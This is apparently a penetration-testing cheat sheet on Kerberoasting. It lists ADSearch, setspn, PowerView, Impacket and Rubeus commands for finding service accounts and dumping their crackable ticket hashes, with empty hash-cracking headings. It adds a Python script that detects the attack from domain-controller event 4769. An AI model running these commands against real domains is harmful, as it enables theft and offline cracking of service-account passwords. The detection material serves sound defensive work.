Kerberoasting

Kerberos Account Discovery

# ADSearch
ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName

# Setspn
PS C:\> setspn -T vulnableone.local -Q */*

# PowerView
Get-DomainUser -SPN | select serviceprincipalname

# AD-Module
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

Impacket

impacket-GetUserSPNs vulnableone.local/svc:Passvord123 -dc-ip 10.10.10.10 -request

Rubeus

Rubeus.exe kerberoast /simple /nowrap
Rubeus.exe kerberoast /user:svc /nowrap
Rubeus.exe kerberoast /stats
Rubeus.exe kerberoast /rc4opsec /outfile:C:\Users\khan.chanthou\Desktop\hashes.txt
Rubeus.exe kerberoast /rc4opsec /domain:vulnableone.local /outfile:C:\Users\khan.chanthou\Desktop\hashes.txt
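
For detection: service ticket requests like the ones above are recorded on domain controllers as Security event 4769 when Kerberos service ticket auditing is enabled. The following is an added example, not part of the original page or of any tool listed here. It flags RC4 (etype 0x17) tickets issued for user-backed services and a single requester pulling tickets for many distinct services in a short window; the record layout, account names, window and threshold are assumptions, and the events are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17                # Kerberos etype 23 (RC4-HMAC)
WINDOW = timedelta(minutes=5)  # assumed correlation window
MAX_DISTINCT_SERVICES = 3      # assumed threshold; tune per environment

# Constructed 4769 records: (time, requester, ServiceName, TicketEncryptionType, Status)
SAMPLE_EVENTS = [
    ("2024-01-01T09:00:01", "alice@VULNABLEONE.LOCAL", "FILESRV01$", "0x12", "0x0"),
    ("2024-01-01T09:00:05", "alice@VULNABLEONE.LOCAL", "svc_web", "0x12", "0x0"),
    ("2024-01-01T09:10:00", "user1@VULNABLEONE.LOCAL", "svc", "0x17", "0x0"),
    ("2024-01-01T09:10:01", "user1@VULNABLEONE.LOCAL", "svc_sql", "0x17", "0x0"),
    ("2024-01-01T09:10:02", "user1@VULNABLEONE.LOCAL", "svc_web", "0x17", "0x0"),
    ("2024-01-01T09:10:03", "user1@VULNABLEONE.LOCAL", "svc_backup", "0x17", "0x0"),
    ("2024-01-01T11:00:00", "bob@VULNABLEONE.LOCAL", "svc_sql", "0x17", "0x0"),
]

def parse(rec):
    ts, user, service, etype, status = rec
    return {"time": datetime.fromisoformat(ts), "user": user.split("@")[0].lower(),
            "service": service, "etype": int(etype, 16), "ok": int(status, 16) == 0}

def is_user_service(e):
    # Keep successful requests only; drop machine accounts ("$") and krbtgt,
    # whose keys are not derived from a human-chosen password.
    return e["ok"] and not e["service"].endswith("$") and e["service"].lower() != "krbtgt"

def detect(records):
    events = sorted((e for e in map(parse, records) if is_user_service(e)),
                    key=lambda e: e["time"])
    findings, by_user = [], defaultdict(list)
    for e in events:
        if e["etype"] == RC4_HMAC:
            findings.append(("rc4_ticket", e["user"], e["service"]))
        by_user[e["user"]].append(e)
    for user, evs in by_user.items():
        for i, first in enumerate(evs):
            # Distinct services requested within WINDOW of this event
            seen = {x["service"] for x in evs[i:] if x["time"] - first["time"] <= WINDOW}
            if len(seen) > MAX_DISTINCT_SERVICES:
                findings.append(("spn_sweep", user, len(seen)))
                break
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

A lone `rc4_ticket` finding can come from a legacy client, so treat it as a lead; pairing it with `spn_sweep` for the same requester is the stronger signal.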

Crack Hash

Hashcat

John

Crack with kerberos tool
